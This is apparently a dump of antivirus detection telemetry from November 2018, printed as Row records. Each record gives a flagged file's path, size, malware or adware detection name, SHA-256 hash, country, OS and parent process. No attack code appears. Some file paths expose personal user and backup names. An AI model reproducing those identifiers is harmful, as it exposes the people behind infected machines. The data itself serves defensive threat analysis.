  Row(detection=Row(filename='avscan-20181104-155115-cf06ca5e', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_6bb2b461\\AVSCAN-20181104-154942-C4D2A19E\\AVSCAN-20181104-155115-CF06CA5E', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='2ffa0baef8f7fe1c15fddfbf27e2355e9ead317e07726d0bc12cd7bbfaf5eb6e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:51:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='giant savingsgui.exe', filepath='C:\\Program Files\\Giant Savings\\Giant SavingsGui.exe', filesize=2096000, name='Adware/CrossRider.whjz.#M1.#R1'), hash='62c965e6c6d4f2658f1c9fbc3d020ab0db5105401c871e8cb8565bdfbf463750', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:LNxY4Orjb0Cjq+LV.1', country='SZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-04T11:36:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001209-6bc787f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001209-6BC787F4', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:41:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='7b10276e5701c1a391e40686cbe8e2dd94256bd6d9bb74387d81e86c825eb970', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:07:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:14:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135522-5d15d044', filepath='C:\\Documents and Settings\\X\\Dane aplikacji\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-135308-BE772684\\AVSCAN-20181104-135522-5D15D044', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9652500\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/MONITOR', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-04T13:16:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='029554d03e6834d2192dc865de492b04fbdd462e', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\029554d03e6834d2192dc865de492b04fbdd462e', filesize=3328000, name='HEUR/APC.#M1.#R1'), hash='1e07dcc56fa40819122decd33760e99aff41fbe03b16694763221129da199d05', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:55:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220140-ada0d546', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-220140-ADA0D546', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:01:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='torntv 2-bg.exe', filepath='C:\\Program Files\\Torntv 2\\Torntv 2-bg.exe', filesize=896000, name='ADWARE/CrossRider.Gen2.#M300.#R101244'), hash='38a75b7396d53b515662130fec4490c372e85cfb06b7c2082bf721c3f4e77a8a', metadata=Row(cmdline='\\\\\\/Q \\\\\\/W', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\MRT.exe', parentsize=133674168, timestamp='2018-11-04T21:07:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001928c', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001928c', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:09:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T21:49:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='exetimer.exe', filepath='C:\\Program Files\\PROLiNK HSPA\\EXETimer.exe', filesize=284000, name='W32/Sality.AT.#M1.#R1'), hash='1d65e1c6ba8bb8a4cf320a3f551fe3a3ded26a530c8d12d7934fa6fd77020f0b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:AOa5A5dzw0Kf6oo8.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-04T21:32:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:22:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='shiromisimulator.exe', filepath='c:\\users\\X\\downloads\\yandere simulator\\yandere simulator mods\\shiromi simulator\\shiromi simulator\\shiromisimulator.exe', filesize=576000, name='HEUR/APC.#M1.#R1'), hash='6b9867fe7d69b4c0d9d0e925412c866f8ba2c108ebf15b81cd83635bac328e2c', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4675384, timestamp='2018-11-04T07:05:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pylori.exe', filepath='C:\\Program Files (x86)\\Jakes\\pylori.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='53112f2b6c10d984e232910c546905079a1e1147948a69dbe1ed1c66e86c58d2', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Jakes\\pylori.exe', parentsize=384000, timestamp='2018-11-04T12:58:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131029-13c5c9a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131029-13C5C9A9', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:10:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055723-51b8e3b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055723-51B8E3B1', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:57:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:47:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unwise.exe', filepath='h:\\games\\التكسى المجنون\\bond\\UNWISE.EXE', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='6a006e22ef55d5be1d26e58fbba12a9a37c9bb6e02e2f2c09655a86532cbd85a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:05:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rlistupdater', filepath='/Volumes/backup/Backups.backupdb/MacBook Pro de erly wilson/2017-09-12-235335/Erly W/Users/erlywilson/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='BR', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T23:15:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='8577329.vir', filepath='\\\\?\\C:\\Program Files (x86)\\Name\\8577329.VIR', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:45:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='f:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T09:26:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141706-aef875d0', filepath='C:\\Dokumente und Einstellungen\\All Users\\Anwendungsdaten\\Avira\\AntiVir Desktop\\TEMP\\AVSCAN-20181104-141628-BF9D0BA0\\AVSCAN-20181104-141706-AEF875D0', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:17:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maxmin.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\asas\\bin\\winx64\\maxmin.exe', filesize=4096000, name='W32/Ramnit.CD.#M1.#R1'), hash='4676e9444b7c4c3605b8daa1063467b7e22625a9a7d0d9040dbf1a83c72bdf25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-04T14:56:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:14:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='googleupdatehelper.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\GoogleUpdateHelper.dll', filesize=704000, name='TR/ExtenBro.uhnh.#M1.#R1'), hash='90b766c3a23bb0a509cf056c743309445e29c27493fae41bbe68bb72bc901899', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:00:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='old.exe', filepath='\\\\?\\D:\\GRAVITY\\Soft\\Bangla\\Bijoy Bayanna 2016\\fscommand\\BijoyTypingTutor\\program files\\Ananda Computers\\Bijoy TypingTutor\\Other\\old.exe', filesize=3584000, name='TR/Patched.Gen.#M300.#R2947'), hash='023b2eb602fac8320d57c749ea05d85d2ba5061006be6c8e42ed25b8e91ebca3', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:52:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ffprobe.exe', filepath='C:\\Creative Destruction\\ffmpeg_bin\\ffprobe.exe', filesize=37228000, name='W32/Sality.AT.#M1.#R1'), hash='bbfc41f3a9ceb0da7d935819441280e81b286129e177a1ca70b115dae47970fe', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:w+tLnuYo0EOXdJof.1', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T11:16:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup (1).zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/MONITOR', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner.exe', parentsize=13797712, timestamp='2018-11-04T12:18:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='htccalc.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Boxs Cracked 2015-2016\\AutoPlay\\Docs\\Volcano Tool\\bin\\HTCCALC.exe', filesize=3392000, name='W32/Sality.AT.#M1.#R1'), hash='dc89f8c174ad6632efaa2e672615d4c58372509964e57216b49356c82c73e1b5', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:48:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221549-8afae547', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221549-8AFAE547', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:15:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-164825-462407c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-163503-DFA342B5\\AVSCAN-20181104-164825-462407C1', filesize=1408000, name='HEUR/AGEN.1003956.#M1.#R1'), hash='1ee107a19d62f9ff979ba3fbb5a39635edad82c34b6ec78b4dc01c08e9083404', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T09:48:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:45:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:32:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2828168.exe', filepath='C:\\Program Files (x86)\\Super\\2828168.exe', filesize=1024000, name='Adware/CsdiMonetize.zfkkq.#M1.#R1'), hash='3d883000c358c04415b50d9c46e276ecc714e168d2ba831cf9b61b9b0d214bfe', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bE4qSJ1uW06lwYx6.1', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T04:27:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='filezilla_server-0_9_50.exe', filepath='\\\\WDMYCLOUDMIRR16\\Public\\Acer17Zoll C A - Daten und TXT FreeFileSync\\Sicherungen, Inst\\inst\\FileZilla FTP-Browser\\FileZilla_Server-0_9_50.exe', filesize=772000, name='HEUR/AGEN.1018746.#M1.#R1'), hash='a50edeec8122526dae3e5a51b01782d5fede7af6650564b7c01c0c5da9309769', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\FreeFileSync\\Bin\\FreeFileSync_x64.exe', parentsize=5850808, timestamp='2018-11-04T11:51:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140312-f6645062', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140312-F6645062', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unwise.exe', filepath='G:\\PUBLICA\\Cida\\AIDF\\backup NF-e\\ARQUIVOS ANTIGOS\\Diversos\\Marcelo 23072009\\Andrea-Camila\\PASTA\\Declarações\\Dirf2006\\UNWISE.EXE', filesize=128000, name='TR/Crypt.XPACK.ilzsk.#M1.#R1'), hash='78d9a17c8ed438abba962d1bc61e851f232b0c4977775a583505710a73400c1d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:03:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173851-0deca73e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_84a1e464\\AVSCAN-20181104-162251-1E8581F7\\AVSCAN-20181104-173851-0DECA73E', filesize=904000, name='Adware/Bang5Mai.IE.#M1.#R1'), hash='bc52336fc528d61dc9b9543f652eb7e1dc4c4263e3dd434d26548fed3f4ae3f6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:38:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='7b7345c9bbea08dbe1d0e1e135889af3bd8d9ddab34d2c14f956d638d209c429', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7B7345C9BBEA08DBE1D0E1E135889AF3BD8D9DDAB34D2C14F956D638D209C429', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7b7345c9bbea08dbe1d0e1e135889af3bd8d9ddab34d2c14f956d638d209c429', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:58:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jmbrxyw.exe', filepath='c:\\users\\X\\appdata\\roaming\\jmbrxyw.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T16:39:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9e4e80b760d990d08c455a290a87fbe4d014a3e58547f1300b702324232fd21a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9E4E80B760D990D08C455A290A87FBE4D014A3E58547F1300B702324232FD21A', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='9e4e80b760d990d08c455a290a87fbe4d014a3e58547f1300b702324232fd21a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:40:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141634-806568aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43862836\\AVSCAN-20181102-141211-4F406CFD\\AVSCAN-20181102-141634-806568AA', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='a667a34467481b7425b4838c314748951a998afb989caa8f4954c7f6a74d010d', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:16:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pconverter.b15b339cdaa14fd0a1eca82c80a522cb.exe', filepath='C:\\Users\\X\\Downloads\\PConverter.b15b339cdaa14fd0a1eca82c80a522cb.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline='-XX:ErrorFile=.\\\\\\/.crashlogs\\\\\\/hs_err_pid%...ng=false -Dsun.java2d.d3...%...ng=false -Dsun.java2d.d3d=false -cp \\\\\\"C:\\\\\\\\Program Files (x86)\\\\\\\\DVAG Online-System\\\\\\\\smartclient\\\\\\\\smartup-7.92.0.0.1.36\\\\\\\\de_compeople_smartup_bootup-1.4.1.0.jar\\\\...ompeople.smartup.bootup.BootUp -jre \\\\\\"C:\\\\\\\\...\\\\\\\\.patchRepo\\\\\\" -ppid 12684 -factor 1.0 -sp...o\\\\\\" -ppid 12684 -factor 1.0 -splash \\\\\\"C:\\\\\\\\Program Files (x86)\\\\\\\\DVAG Online-System\\\\\\\\smartclient\\\\\\\\smartup-7.92.0.0.1.36\\\\\\\\dvag.bmp\\\\\\" -profile de', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\DVAG Online-System\\jre\\jre-1.8.0.172\\bin\\javaw.exe', parentsize=192424, timestamp='2018-11-02T15:20:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150357-9ad079ef', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AVSCAN-20181102-141931-6546E9EB\\AVSCAN-20181102-150357-9AD079EF', filesize=2816000, name='BDS/Hupigon.Gen.#M300.#R217'), hash='b4edde43fddf8aad8eb80bd09846733dc2330336f270b750f117a3983fba0288', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-074928-9aeedf16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-074928-9AEEDF16', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='d3a83824ddd62393cea8f2b51208d43938dd426e6d4ba6b47c516821ee0fe21a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:51:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dmxhlxs.exe', filepath='c:\\users\\X\\appdata\\roaming\\dmxhlxs.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T12:45:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wweqirca.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\WweqIrcA.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:30:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsfC758.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:26:37Z'), dt=datetime.date(2018, 11, 2)),
